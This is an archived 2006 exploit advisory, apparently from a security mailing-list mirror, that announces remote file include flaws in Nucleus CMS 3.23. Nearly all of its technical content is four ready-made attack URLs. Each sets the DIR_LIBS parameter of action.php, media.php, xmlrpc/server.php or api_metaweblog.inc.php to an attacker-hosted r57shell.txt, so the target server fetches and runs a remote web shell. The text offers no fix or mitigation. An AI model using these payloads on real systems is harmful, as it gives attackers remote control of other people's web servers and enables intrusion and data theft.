OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
file include exploits in nucleus 3.23

gamr-14hotmail.com
Date: Fri Jun 16 2006 - 12:01:28 CDT


Multiple file include exploits in nucleus 3.23

script type : nucleus 3.23
bug found by : sweet-devil
team : site-down
type : file include

####################################################
exploits :

action.php

http://www.example.com/path/action.php?DIR_LIBS=http://yoursite/r57shell.txt?

media.php

http://www.example.com/path/nucleus/media.php?DIR_LIBS=http://yoursite/r57shell.txt?

server.php

http://www.example.com/path/nucleus/xmlrpc/server.php?DIR_LIBS=http://yoursite/r57shell.txt?

api_metaweblog.inc.php

http://www.example.com/path/nucleus/xmlrpc/api_metaweblog.inc.php?DIR_LIBS=http://yoursite/r57shell.txt?

####################################################

#######################
emails:

gamr-14hotmail.com & black-cod3hotmail.com
#######################

All my respect to our friends , lezr.com

done .. peace